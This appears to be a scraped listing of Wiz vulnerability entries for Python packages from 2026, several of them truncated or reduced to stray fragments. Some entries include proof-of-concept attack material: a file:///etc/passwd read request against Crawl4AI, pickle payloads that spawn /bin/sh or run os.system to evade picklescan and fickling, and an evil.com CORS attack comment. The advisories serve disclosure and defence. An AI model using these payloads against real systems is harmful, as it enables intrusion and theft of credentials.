Published January 13, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2026-22777 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-22777 : Python vulnerability analysis and mitigation
ComfyUI-Manager is an extension designed to enhance the usability of ComfyUI. Prior to versions 3.39.2 and 4.0.5, an attacker can inject special characters into HTTP query parameters to add arbitrary configuration values to the config.ini file. This can lead to security setting tampering or modification of application behavior. This issue has been patched in versions 3.39.2 and 4.0.5.
Source : NVD
## 7.5
Score
Published January 10, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.2
Exploitation Probability (EPSS) N/A
Wiz
CVE-2025-68146 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
## CVE-2025-68146 : Python vulnerability analysis and mitigation
filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to c
Wiz
CVE-2026-33332 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-33332 : Python vulnerability analysis and mitigation
NiceGUI is a Python-based UI framework. Prior to version 3.9.0, NiceGUI's app.add_media_file() and app.add_media_files() media routes accept a user-controlled query parameter that influences how files are read during streaming. The parameter is passed to the range-response implementation without validation, allowing an attacker to bypass chunked streaming and force the server to load entire files into memory at once. With large media files and concurrent requests, this can lead to excessive memory consumption, degraded performance, or denial of service. This issue has been patched in version 3.9.0.
Source : NVD
## 6.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wiz
GHSA-vx9w-5cx4-9796 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## GHSA-vx9w-5cx4-9796 : Python vulnerability analysis and mitigation
A local file inclusion vulnerability exists in the Crawl4AI Docker API. The /execute_js, /screenshot, /pdf, and /html endpoints accept file:// URLs, allowing attackers to read arbitrary files from the server filesystem.
Attack Vector:
```http
POST /execute_js
{
  "url": "file:///etc/passwd",
  "scripts": ["document.body.innerText"]
}
```
## Impact
An unauthenticated attacker can:
- Read sensitive files (/etc/passwd, /etc/shadow, application configs)
- Access environment variables via /proc/self/environ
- Discover internal application structure
- Potentially read credentials and API keys
## Workarounds
- Disable the Docker API
- Add authentication to the API
- Use network-level filtering
Source : NVD
## 9.2
Score
Published January 16, 2026
Wiz
GHSA-5r2p-pjr8-7fh7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-5r2p-pjr8-7fh7 : Python vulnerability analysis and mitigation
## Summary
This advisory addresses the use of the search_hub() function within the SageMaker Python SDK's JumpStart search functionality. An actor with the ability to control query parameters passed to the search_hub() function could potentially provide malformed input that causes the eval() function to execute arbitrary commands, access sensitive data, or compromise the execution environment.
A defense-in-depth enhancement has been implemented to replace code evaluation with safe string operations when processing search query parameters. This enhancement removes the use of eval() from the execution path, replacing it with a safe recursive descent parser. The change was released in SageMaker Python SDK version 3.4.0
Wiz
CVE-2026-26216 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
## CVE-2026-26216 : Python vulnerability analysis and mitigation
Crawl4AI versions prior to 0.8.0 contain a remote code execution vulnerability in the Docker API deployment. The /crawl endpoint accepts a hooks parameter containing Python code that is executed using exec(). The `__import__` builtin was included in the allowed builtins, allowing unauthenticated remote attackers to import arbitrary modules and execute system commands. Successful exploitation allows full server compromise, including arbitrary command execution, file read and write access, sensitive data exfiltration, and lateral movement within internal networks.
Source : NVD
## 10
Score
Published February 12, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit Yes
Wiz
GHSA-c65f-x25w-62jv Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## GHSA-c65f-x25w-62jv : Python vulnerability analysis and mitigation
## Summary
The servers ship with `allow_origins=["*"]`, `allow_credentials=True`, `allow_methods=["*"]` and `allow_headers=["*"]`.
## Affected Code
```python
# server/key-server/app/main.py:86-92
# server/telemetry-server/app/main.py:23-29
app.add_middleware(
    CORSMiddleware,
    allow_origins=settings.cors_origins,  # defaults to ["*"]
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
```
`openssl_encrypt_server/docker-compose.yml:75` sets `CORS_ORIGINS` to `*`, and `.env.example` ships `CORS_ORIGINS=*`.
## Impact
This is the most permissive CORS configuration possible, allowing any website to make fully credentialed cross-origin requests to the API. An attacker's website could make authenticated API calls on behalf of any user who visits it.
Wiz
CVE-2026-33981 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
## CVE-2026-33981 : Python vulnerability analysis and mitigation
jq:
jqraw:
env
SALTED_PASS
PLAYWRIGHT_DRIVER_URL
HTTP_PROXY
Source : NVD
## 8.3
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
changedetection.io
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Wiz
CVE-2026-3989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
## CVE-2026-3989 : Python vulnerability analysis and mitigation
replay_request_dump.py
Source : NVD
## 7.8
Score
Published March 12, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
SGLang
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sglang
cpe:2.3:a:lmsys:sglang
Sources
NVD
pip Severity HIGH No Fix Added at: Mar 12, 2026
Linux Severity HIGH No Fix Added at: Apr 02, 2026
Windows Severity HIGH No Fix Added at: Apr 02, 2026
Wiz
CVE-2026-32874 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
## CVE-2026-32874 : Python vulnerability analysis and mitigation
UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.4.0 through 5.11.0 contain an accumulating memory leak in JSON parsing large (outside of the range [-2^63, 2^64 - 1]) integers. The leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than sys.get_int_max_str_digits() digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload. Any service that calls ujson.load()/ujson.loads()/ujson.decode() on untrusted inputs is affected and vulnerable to denial of serv
Wiz
CVE-2026-30762 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## CVE-2026-30762 : Python vulnerability analysis and mitigation
Subject: Security Vulnerability Report Hardcoded JWT Secret (CVE-2026-30762)
Hi HKUDS team,
I'm writing to report a security vulnerability I discovered in LightRAG v1.4.10. This has been assigned CVE-2026-30762 by MITRE.
Vulnerability: Hardcoded JWT signing secret
Type: Improper Authentication (CWE-287)
Severity: High
Attack Vector: Remote / Unauthenticated
Summary:
The file lightrag/api/config.py (line 397) uses a default JWT secret "lightrag-jwt-default-secret" when the TOKEN_SECRET environment variable is not set. The AuthHandler in lightrag/api/auth.py (lines 24-25) uses this secret to sign and verify tokens. An unauthenticated attacker can forge valid JWT tokens using the publicly known default secret and gain access t
Wiz
CVE-2026-33155 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
## CVE-2026-33155 : Python vulnerability analysis and mitigation
DeepDiff is a project focused on Deep Difference and search of any Python data. From version 5.0.0 to before version 8.6.2, the pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data. This issue has been patched in version 8.6.2.
Source : NVD
## 8.7
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Chainguard
Wiz
GHSA-wccx-j62j-r448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
## GHSA-wccx-j62j-r448 : Python vulnerability analysis and mitigation
## Assessment
pickle.loads
_pickle.loads
_pickle.load
## Original report
## Summary
fickling.always_check_safety()
pickle.loads
_pickle.loads
_pickle.load
## Affected versions
<= 0.1.8
## Non-duplication check against published Fickling GHSAs
run_hook()
## Root cause
run_hook()
pickle.load
pickle.Unpickler
_pickle.Unpickler
pickle.loads
_pickle.load
_pickle.loads
## Reproduction (clean upstream)
```python
import io, pickle, _pickle
from unittest.mock import patch
import fickling
from fickling.exception import UnsafeFileError

class Payload:
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, (['echo','BYPASS'],))

data = pickle.dumps(Payload())
fickling.always_check_safety()
# Bypa
```
Wiz
CVE-2025-65713 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.0
CVE-2025-65713 [MEDIUM] CVE-2025-65713 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65713 :
Python vulnerability analysis and mitigation
Home Assistant Core before v2025.8.0 is vulnerable to Directory Traversal. The Downloader integration does not fully validate file paths during concatenation, leaving a path traversal vulnerability.
Source : NVD
## 4
Score
Published December 23, 2025
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
home-assistant
homeassistant
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Dec 24, 2025
Homebrew Severity MEDIUM Has Fix Added at: Jan 08, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-25990 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-25990 [HIGH] CVE-2026-25990 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25990 :
Python vulnerability analysis and mitigation
Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, an out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.
Source : NVD
## 8.9
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tensorflow-cpu-jupyter
python3-pillow
Sources
NVD
Alpine 3.23, edge Severity HIGH Has Fix Added at: Feb 15, 2026
Chainguard Has Fix Added at: Feb 15, 2026
Debian 11, 12 No Fix Added at: Feb 12,
Wiz
CVE-2026-4539 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4539 [CRITICAL] CVE-2026-4539 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4539 :
Python vulnerability analysis and mitigation
A security flaw has been discovered in pygments up to 2.19.2. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.7
Exploitation Probabil
Wiz
CVE-2026-26057 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-26057 [MEDIUM] CVE-2026-26057 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26057 :
Python vulnerability analysis and mitigation
Skill Scanner is a security scanner for AI Agent Skills that detects prompt injection, data exfiltration, and malicious code patterns. A vulnerability in the API Server of Skill Scanner could allow an unauthenticated, remote attacker to interact with the server API and either trigger a denial of service (DoS) condition or upload arbitrary files. This vulnerability is due to an erroneous binding to multiple interfaces. An attacker could exploit this vulnerability by sending API requests to a device exposing the affected API Server. A successful exploit could allow the attacker to consume an excessive amount of resources (memory starvation) or to upload files to arbitrary folders on the affected device. This vulnerability affe
Wiz
CVE-2026-34938 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-34938 [CRITICAL] CVE-2026-34938 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34938 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 1.5.90, execute_code() in praisonai-agents runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a str subclass with an overridden startswith() method to the _safe_getattr wrapper, achieving arbitrary OS command execution on the host. This issue has been patched in version 1.5.90.
Source : NVD
## 10
Score
Published April 3, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 27.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
praisonai
Wiz
CVE-2026-31899 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-31899 [HIGH] CVE-2026-31899 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31899 :
Python vulnerability analysis and mitigation
CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.
Source : NVD
## 7.5
Score
Published March 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cairosvg
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 14, 2026
Debian 14 Severity HIGH No Fix Added at: Mar 14, 2026
Echo Sev
Wiz
CVE-2026-28788 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-28788 [HIGH] CVE-2026-28788 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28788 :
Python vulnerability analysis and mitigation
POST /api/v1/retrieval/process/files/batch
GET /api/v1/knowledge/{id}/files
Source : NVD
## 7.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:openwebui:open_webui
open-webui
Sources
pip Severity HIGH Has Fix Added at: Mar 29, 2026
Linux Severity HIGH Has Fix Added at: Mar 29, 2026
Windows Severity HIGH Has Fix Added at: Mar 29, 2026
Linux Severity HIGH Has Fix Added at: Apr 05, 2026
Windows Severity HIGH Has Fix Added at: Apr 05
Wiz
CVE-2026-32610 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32610 [HIGH] CVE-2026-32610 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32610 :
Python vulnerability analysis and mitigation
allow_origins=["*"]
allow_credentials=True
CORSMiddleware
Origin
Access-Control-Allow-Origin
*
Source : NVD
## 8.1
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 2026
pip Severity HIGH Has Fix Added at: Mar 17, 2026
Homebrew Severity HIGH Has Fix Added at: Mar 22, 2
Wiz
CVE-2026-28348 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28348 [MEDIUM] CVE-2026-28348 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28348 :
Python vulnerability analysis and mitigation
lxml.html.clean
Source : NVD
## 6.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python3-lxml-html-clean
python-lxml-html-clean
Sources
NVD
Alpine 3.21, 3.22 Severity MEDIUM No Fix Added at: Mar 10, 2026
Chainguard Has Fix Added at: Mar 10, 2026
Debian 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Echo Severity MEDIUM No Fix Added at: Mar 08, 2026
pip Severity MEDIUM Has Fix Ad
Wiz
CVE-2026-33992 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-33992 [CRITICAL] CVE-2026-33992 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33992 :
Python vulnerability analysis and mitigation
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, PyLoad's download engine accepts arbitrary URLs without validation, enabling Server-Side Request Forgery (SSRF) attacks. An authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata. On DigitalOcean droplets, this exposes sensitive infrastructure data including droplet ID, network configuration, region, authentication keys, and SSH keys configured in user-data/cloud-init. Version 0.5.0b3.dev97 contains a patch.
Source : NVD
## 9.3
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV
Wiz
CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-27826 [HIGH] CVE-2026-27826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27826 :
Python vulnerability analysis and mitigation
Authorization
169[.]254[.]169[.]254
Source : NVD
## 8.2
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-atlassian
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
Wiz
CVE-2026-27838 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2026-27838 [LOW] CVE-2026-27838 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27838 :
Python vulnerability analysis and mitigation
self.get_object()
pk
Source : NVD
## 3.5
Score
Published February 26, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wger
Sources
NVD
pip Severity LOW No Fix Added at: Mar 02, 2026
Wiz
GHSA-g9rg-8vq5-mpwm Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-g9rg-8vq5-mpwm Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-g9rg-8vq5-mpwm :
Python vulnerability analysis and mitigation
## Summary
MCP_HTTP_ENABLED=true
allow_origins=['*']
allow_credentials=True
allow_methods=["*"]
allow_headers=["*"]
Access-Control-Allow-Origin: *
MCP_ALLOW_ANONYMOUS_ACCESS=true
## Details
## Vulnerable Code
config.py:546
CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', '*').split(',')
['*']
app.py:274-280
```python
# CORS middleware
app.add_middleware(
    CORSMiddleware,
    allow_origins=CORS_ORIGINS,  # ['*'] by default
    allow_credentials=True,  # Unnecessary for anonymous access; bad practice
    allow_methods=["*"],
    allow_headers=["*"],
)
```
## How the Attack Works
Access-Control-Allow-Origin: *
// Running on https://evil.com - reads victim's memories
// No credentials needed - anonymous access means the API is open
cons
Wiz
CVE-2026-33430 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33430 [HIGH] CVE-2026-33430 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33430 :
Python vulnerability analysis and mitigation
briefcase create
Source : NVD
## 7.3
Score
Published March 26, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
briefcase
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 24, 2026
Wiz
CVE-2026-31826 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-31826 [MEDIUM] CVE-2026-31826 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31826 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to 6.8.0, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing a content stream with a rather large /Length value, regardless of the actual data length inside the stream. This vulnerability is fixed in 6.8.0.
Source : NVD
## 6.8
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
litellm
nemo
Sources
NVD
Chainguard Has Fix Added at:
Wiz
GHSA-vqmv-47xg-9wpr Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vqmv-47xg-9wpr Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vqmv-47xg-9wpr :
Python vulnerability analysis and mitigation
## Summary
Using pty.spawn, which is a built-in python library function to execute arbitrary commands on the host system.
## Details
pty.spawn
__reduce__
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
The victim proceeds to load the pickle file and execute attacker-injected arbitrary code.
## PoC
```python
import pty

class PtyExploit:
    def __reduce__(self):
        return (pty.spawn, (["/bin/sh", "-c", "id; exit"],))
```
## Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the pickle file is loaded.
Wiz
CVE-2026-25904 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-25904 [MEDIUM] CVE-2026-25904 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25904 :
Python vulnerability analysis and mitigation
The Pydantic-AI MCP Run Python tool configures the Deno sandbox with an overly permissive configuration that allows the underlying Python code to access the localhost interface of the host to perform SSRF attacks. Note - the "mcp-run-python" project is archived and unlikely to receive a fix.
Source : NVD
## 5.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-run-python
Sources
NVD
pip Severity MEDIUM No Fix Added at: Feb 12, 2026
Wiz
CVE-2026-27735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
CVE-2026-27735 [MEDIUM] CVE-2026-27735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27735 :
Python vulnerability analysis and mitigation
../
Source : NVD
## 6.4
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 6.4
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mcp-server-git
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
Wiz
GHSA-cffc-mxrf-mhh4 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-cffc-mxrf-mhh4 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-cffc-mxrf-mhh4 :
Python vulnerability analysis and mitigation
## Summary
Picklescan uses numpy.f2py.crackfortran.param_eval, which is a function in numpy to execute remote pickle files.
## Details
The attack payload executes in the following steps:
First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.param_eval function via reduce method.
Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution.
## PoC
```python
class RCE:
    def __reduce__(self):
        from numpy.f2py.crackfortran import param_eval
        return (param_eval, ("os.system('ls')", None, None, None))
```
## Impact
Any
Wiz
CVE-2026-22798 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-22798 [MEDIUM] CVE-2026-22798 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22798 :
Python vulnerability analysis and mitigation
hermes is an implementation of the HERMES workflow to automatize software publication with rich metadata. From 0.8.1 to before 0.9.1, hermes subcommands take arbitrary options under the -O argument. These have been logged in raw form. If users provide sensitive data such as API tokens (e.g., via hermes deposit -O invenio_rdm.auth_token SECRET), these are written to the log file in plain text, making them available to whoever can access the log file. This vulnerability is fixed in 0.9.1.
Source : NVD
## 5
Score
Published January 12, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Pr
Wiz
CVE-2026-1777 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-1777 [HIGH] CVE-2026-1777 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1777 :
Python vulnerability analysis and mitigation
The Amazon SageMaker Python SDK before v3.2.0 and v2.256.0 includes the ModelBuilder HMAC signing key in the cleartext response elements of the DescribeTrainingJob function. A third party with permissions to both call this API and permissions to modify objects in the Training Jobs S3 output location may have the ability to upload arbitrary artifacts which are executed the next time the Training Job is invoked.
Source : NVD
## 8.5
Score
Published February 2, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.4
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2025-68492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2025-68492 [LOW] CVE-2025-68492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68492 :
Python vulnerability analysis and mitigation
Chainlit versions prior to 2.8.5 contain an authorization bypass through user-controlled key vulnerability. If this vulnerability is exploited, threads may be viewed or thread ownership may be obtained by an attacker who can log in to the product.
Source : NVD
## 2.3
Score
Published January 14, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
chainlit
Sources
NVD
pip Severity LOW Has Fix Added at: Jan 15, 2026
Wiz
CVE-2026-2256 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-2256 [MEDIUM] CVE-2026-2256 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2256 :
Python vulnerability analysis and mitigation
A command injection vulnerability in ModelScope's ms-agent versions v1.6.0rc1 and earlier exists, allowing an attacker to execute arbitrary operating system commands through crafted prompt-derived input.
Source : NVD
## 6.5
Score
Published March 2, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 84.6
Exploitation Probability (EPSS) 2.3
Affected packages and libraries
ms-agent
Sources
NVD
pip Severity MEDIUM No Fix Added at: Mar 05, 2026
Wiz
CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
